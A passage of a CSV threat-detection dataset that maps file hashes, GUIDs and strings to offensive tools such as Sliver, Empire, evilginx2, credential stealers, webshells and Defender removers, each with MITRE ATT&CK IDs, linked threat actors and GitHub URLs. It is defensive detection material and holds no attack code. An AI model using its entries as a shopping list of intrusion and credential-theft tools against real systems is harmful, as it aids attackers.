tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","37335" "*c9203ada65ee8c0c96d177343c3ae42592f4486e5ef05bce0dab3108e9935862*",".{0,1000}c9203ada65ee8c0c96d177343c3ae42592f4486e5ef05bce0dab3108e9935862.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37337" "*c922f6e29c844d15946890f4872230dd9469dd0cce084e913a8df3ef3ea5d126*",".{0,1000}c922f6e29c844d15946890f4872230dd9469dd0cce084e913a8df3ef3ea5d126.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37338" "*c923b2051d3e822e390e80c7e8d56f6b2cc62ae6688ca73745684b57154f3ecb*",".{0,1000}c923b2051d3e822e390e80c7e8d56f6b2cc62ae6688ca73745684b57154f3ecb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37339" "*c92580318be4effdb37aa67145748826f6a9e285bc2426410dc280e61e3c7620*",".{0,1000}c92580318be4effdb37aa67145748826f6a9e285bc2426410dc280e61e3c7620.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37340" "*c929214fbc050208831b18c088d33e0db1ffcd2f26103bc3a69b0081683db1c8*",".{0,1000}c929214fbc050208831b18c088d33e0db1ffcd2f26103bc3a69b0081683db1c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37341" 
"*c92eaefade39fccf3a8926ae8b579333b37a58bc15e4c536eeb16b6bdb97f5c8*",".{0,1000}c92eaefade39fccf3a8926ae8b579333b37a58bc15e4c536eeb16b6bdb97f5c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37342" "*c93370cc4ea9cd3e11dd4c24884e8d91a3c062e739ca5a33eabf8ed19a15b92f*",".{0,1000}c93370cc4ea9cd3e11dd4c24884e8d91a3c062e739ca5a33eabf8ed19a15b92f.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","37343" "*c933e37b3b281f081e395a20bb950a1a5130f839bf3477f0bf6fc62c1535591b*",".{0,1000}c933e37b3b281f081e395a20bb950a1a5130f839bf3477f0bf6fc62c1535591b.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","37346" "*c93f1ff5eaa4bf916a60985cefe63fbb630234d620567da3561c41f652a469ed*",".{0,1000}c93f1ff5eaa4bf916a60985cefe63fbb630234d620567da3561c41f652a469ed.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - 
T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37348" "*c93ff0ad29732505e9679eed6561ceef907bcb1f5df9b6a588c23e484df85681*",".{0,1000}c93ff0ad29732505e9679eed6561ceef907bcb1f5df9b6a588c23e484df85681.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","37349" 
"*c942e9aa3e16c4cad9415815f8e3faea0056d3bef8f9eca6373d605c84542f23*",".{0,1000}c942e9aa3e16c4cad9415815f8e3faea0056d3bef8f9eca6373d605c84542f23.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37351" "*c9436dd6ae789bd83bada6aa823ea7f3d1a36455e818d78f64ab296222dd3362*",".{0,1000}c9436dd6ae789bd83bada6aa823ea7f3d1a36455e818d78f64ab296222dd3362.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37352" "*c9448628b8a4a715f780bf821eab6e39962a774ecdcf808628ea6ef952372722*",".{0,1000}c9448628b8a4a715f780bf821eab6e39962a774ecdcf808628ea6ef952372722.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37353" "*c9477106a63804fc0fc18aec7db98e372faac1cf192d976211b9867a22354c85*",".{0,1000}c9477106a63804fc0fc18aec7db98e372faac1cf192d976211b9867a22354c85.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","37354" "*c949913be70a42e2ea9395d2a2e7ac427cdc0d756b6b12d1e607ba3e11937e35*",".{0,1000}c949913be70a42e2ea9395d2a2e7ac427cdc0d756b6b12d1e607ba3e11937e35.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","37356" "*c94e83dd256ed32fcb8b6cdbe709fe9951c133f8f1e19cd2ceb5b6dc075a114b*",".{0,1000}c94e83dd256ed32fcb8b6cdbe709fe9951c133f8f1e19cd2ceb5b6dc075a114b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37357" "*c9574e5fa7bf17835ec454e507aa359f07fbc1903c8cb643e23e81a2614150e8*",".{0,1000}c9574e5fa7bf17835ec454e507aa359f07fbc1903c8cb643e23e81a2614150e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37358" "*c9598fe89c9f4ca470ce47b556fea6289b05b1850c629c2c2f51f2efc995247c*",".{0,1000}c9598fe89c9f4ca470ce47b556fea6289b05b1850c629c2c2f51f2efc995247c.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential 
Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37359" "*c96ef7d84ab7d43b03330daf4e78c11aa9407662f4a18d1824fa1506694c8c56*",".{0,1000}c96ef7d84ab7d43b03330daf4e78c11aa9407662f4a18d1824fa1506694c8c56.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","37363" "*c973abdd59e75eda169065c64631477fa9ad6f01e3536d6f0754c27d0aeeec72*",".{0,1000}c973abdd59e75eda169065c64631477fa9ad6f01e3536d6f0754c27d0aeeec72.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","37364" "*c97c3cf0f90fa6725324159635d3713685c751cba0ec854501c3fc979a349647*",".{0,1000}c97c3cf0f90fa6725324159635d3713685c751cba0ec854501c3fc979a349647.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37365" "*c97df5d25ea1e9ed5b95606adc492cfb6d4fe97e2a538fcaef0ea66f1a239e64*",".{0,1000}c97df5d25ea1e9ed5b95606adc492cfb6d4fe97e2a538fcaef0ea66f1a239e64.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - 
T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#filehash","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","37366" "*c97e3b0e4180217fe46b36d70163c750a40ed76d402ca6c1784e3d8e6c3b22b0*",".{0,1000}c97e3b0e4180217fe46b36d70163c750a40ed76d402ca6c1784e3d8e6c3b22b0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37367" "*c97e849bf283c760811373be29c588adc6ad820d7695a7552e87be693bea0ee6*",".{0,1000}c97e849bf283c760811373be29c588adc6ad820d7695a7552e87be693bea0ee6.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#filehash","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","37368" "*c98676e955d513ce879f60ab157673e4d22c273b4f940c16258fa0bfd8729ffd*",".{0,1000}c98676e955d513ce879f60ab157673e4d22c273b4f940c16258fa0bfd8729ffd.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37369" "*c995ae7e3e3ee04173a5ff56b676ed74057cbdc9fec4466a4402a42c1d56e060*",".{0,1000}c995ae7e3e3ee04173a5ff56b676ed74057cbdc9fec4466a4402a42c1d56e060.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37372" "*c9978b0c3712e43f8e102dbff7ee57f7d59f38d5d17b0304bd691ba1c53a8893*",".{0,1000}c9978b0c3712e43f8e102dbff7ee57f7d59f38d5d17b0304bd691ba1c53a8893.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","37373" 
"*c99shell - Edited By KingDefacer*",".{0,1000}c99shell\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37374" "*c9a56e555aa154cca1e25d511e2201cc522307ca09b54346860d375447ec7929*",".{0,1000}c9a56e555aa154cca1e25d511e2201cc522307ca09b54346860d375447ec7929.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","37375" "*c9a67da63c7f2a139df34098d0e74e225b67ed7acc93b18ff23601ce291ab00b*",".{0,1000}c9a67da63c7f2a139df34098d0e74e225b67ed7acc93b18ff23601ce291ab00b.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","37376" "*C9AF8FE1-CDFC-4DDD-B314-B44AD5EAD552*",".{0,1000}C9AF8FE1\-CDFC\-4DDD\-B314\-B44AD5EAD552.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#GUIDproject","behavior detections opportunities here 
https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","37378" "*c9bdad45179ca59d8b6b725d329b8ab1ba8e1561c44cc3a14093bfe3c97df3ae*",".{0,1000}c9bdad45179ca59d8b6b725d329b8ab1ba8e1561c44cc3a14093bfe3c97df3ae.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","37381" "*c9c4b50a5eada9222d7c82caf9986fba3491dc9f55e8bdd0df2b8893936f4d98*",".{0,1000}c9c4b50a5eada9222d7c82caf9986fba3491dc9f55e8bdd0df2b8893936f4d98.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37383" "*c9cb3638fbe1f4f28f08e4fad0394c4535de00e16854a2952936787d032c6c2f*",".{0,1000}c9cb3638fbe1f4f28f08e4fad0394c4535de00e16854a2952936787d032c6c2f.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","37385" "*c9cd5c71f55be91b6f64f93e17d7dd2a3fa9b66dda9b9c11bf4140c66f18ed39*",".{0,1000}c9cd5c71f55be91b6f64f93e17d7dd2a3fa9b66dda9b9c11bf4140c66f18ed39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37387" "*c9cfc822e5fe51fc15df971b147acf9cc5c572c026cacafbfab860006e39404a*",".{0,1000}c9cfc822e5fe51fc15df971b147acf9cc5c572c026cacafbfab860006e39404a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37388" "*c9d16fdf0e5aa489bd8c6f0d930a8c25d9ad665583adb7780bc261b4df9c639c*",".{0,1000}c9d16fdf0e5aa489bd8c6f0d930a8c25d9ad665583adb7780bc261b4df9c639c.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","37389" "*c9d40a5ec773680f943308b52b64ba1a4d37863570da23b5f4f7801012eff3f9*",".{0,1000}c9d40a5ec773680f943308b52b64ba1a4d37863570da23b5f4f7801012eff3f9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy 
server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37390" "*c9d9c56c1eb6891ede852ccc96dc343afbd5057ab0451bc75ba7095203f0762a*",".{0,1000}c9d9c56c1eb6891ede852ccc96dc343afbd5057ab0451bc75ba7095203f0762a.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","37391" "*c9da78ad6095451caaf4dc686005d5145494e9f7be36514423a111242ff523f2*",".{0,1000}c9da78ad6095451caaf4dc686005d5145494e9f7be36514423a111242ff523f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37392" "*c9dc3acf51b8cbfc14f4fd6f69bd3743d695c8e6013736a5b336ed6200c7036d*",".{0,1000}c9dc3acf51b8cbfc14f4fd6f69bd3743d695c8e6013736a5b336ed6200c7036d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37393" "*c9dd616338b6ae5e80bb13fdb5474890eea5dec01daad27e519c2981eaaa0dee*",".{0,1000}c9dd616338b6ae5e80bb13fdb5474890eea5dec01daad27e519c2981eaaa0dee.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37394" "*c9def37771dabf11171830fdd27b3b751955f40c577fae3f9691188ed3f90b08*",".{0,1000}c9def37771dabf11171830fdd27b3b751955f40c577fae3f9691188ed3f90b08.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#filehash","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","37395" "*c9e18496bf7328f9ef0fc8f4d2958b1cb39e52a1a1d365666c8931def2068933*",".{0,1000}c9e18496bf7328f9ef0fc8f4d2958b1cb39e52a1a1d365666c8931def2068933.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37396" "*c9e4ebc73927d640543ab65574a94eed4d072e59d366ab37be405605914fa42d*",".{0,1000}c9e4ebc73927d640543ab65574a94eed4d072e59d366ab37be405605914fa42d.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","37397" "*c9e90cee55ca810c9fd750d6816e523aa86dce12bbfbf3d448440bbdacdcb31c*",".{0,1000}c9e90cee55ca810c9fd750d6816e523aa86dce12bbfbf3d448440bbdacdcb31c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37399" "*c9f355952a93723f4e6b471380f35a1315af1d2de40524ee0bdd252deded71d2*",".{0,1000}c9f355952a93723f4e6b471380f35a1315af1d2de40524ee0bdd252deded71d2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
